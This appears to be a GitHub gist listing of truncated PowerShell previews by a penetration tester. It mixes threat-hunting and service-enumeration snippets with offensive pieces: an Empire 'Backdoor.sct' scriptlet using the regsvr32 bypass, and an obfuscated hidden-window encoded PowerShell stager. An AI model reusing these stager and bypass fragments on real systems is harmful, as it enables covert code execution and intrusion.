Scott Sutherland nullbind
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author: Alexander Leary | |
| #-------------------------------------------------------------------------------- | |
| # Add-ObjectWMI | |
| #-------------------------------------------------------------------------------- | |
| Function local:Add-ObjectWMI{ | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true, | |
| ValueFromPipelineByPropertyName=$true, HelpMessage="Name")] | |
| [string]$Name = "", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $allusersstartuP = Invoke-Command -Session (Get-PSSession) -ScriptBlock {Get-childItem "$env:ALLUSERSPROFILE\Microsoft\Windows\Start Menu\Programs\StartUp\" | select fullname} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-HuntEvents { | |
| # Set event ids | |
| $x = "4768,4662,1917,216,8224,20001,106,4720,4732" | |
| # Parse into list | |
| $y = $x.Split(',') | |
| # Look up events |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate | |
| #this can be run against all active psremoting sessions |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-WmiObject -Class win32_service | Select Name,ServiceName,Description,PathName,ServiceType,StartMode,Status,InstallDate | |
| #this can be run against all active psremoting sessions |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # use this with powershell remote sessions | |
| # New-PSDrive -PSProvider ActiveDirectory -Name RemoteADS -Root "" -Server a.b.c.d -credential domain\user | |
| # cd RemoteADS: | |
| # Get-ADComputer -Filter * -Properties name | select @{Name="ComputerName";Expression={$_."name"}} | New-PSSession | |
| # Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1 | |
| # $Results = Get-PSSession | Invoke-Command -FilePath C:\Invoke-HuntRegAutoruns.ps1 | |
| # $ScriptBlock = "ps code" | |
| # Invoke-Command -Session (Get-PSSession) -ScriptBlock {$ScriptBlock} | |
| # Invoke-Command -Session (Get-PSSession) -FilePath C:\Invoke-HuntRegAutoruns.ps1 | |
| # $Results | Export-Csv -Notypeinformation results.csv |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{20001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #$results = Expand-SpfRecord -domain netspi.com -RecurseInclude | |
| #$results | select spfrecord | foreach {$_.spfrecord -split(" ")} | |
| # need to handle the variables - they currently cause errors | |
| # need to parse ipranges and check for owners, check if they can be bought and something in the range can be bought | |
| # need to parse domains, check if any are expired. | |
| <#PSScriptInfo | |
| .VERSION 0.9.0 | |
| .GUID 16e3e002-a6d7-4130-b599-5dd23438d194 | |
| .AUTHOR Cory Calahan |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| # Invoke-SPFCrawl Outline | |
| # check out: | |
| https://github.com/pushsecurity/saas-attacks/blob/main/techniques/dns_reconnaissance/description.md | |
| https://github.com/BishopFox/SpoofcheckSelfTest | |
| https://github.com/binaryfigments/emaildefense - check spf, dmarc, dkim, authenticated data, tlsa, DANE; does not flatten, no owner or other lookup info | |
| - https://pkg.go.dev/github.com/binaryfigments/emaildefense | |
| https://github.com/GlobalCyberAlliance/GCADMARCRiskScanner |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBPAGsAVQAwAGw |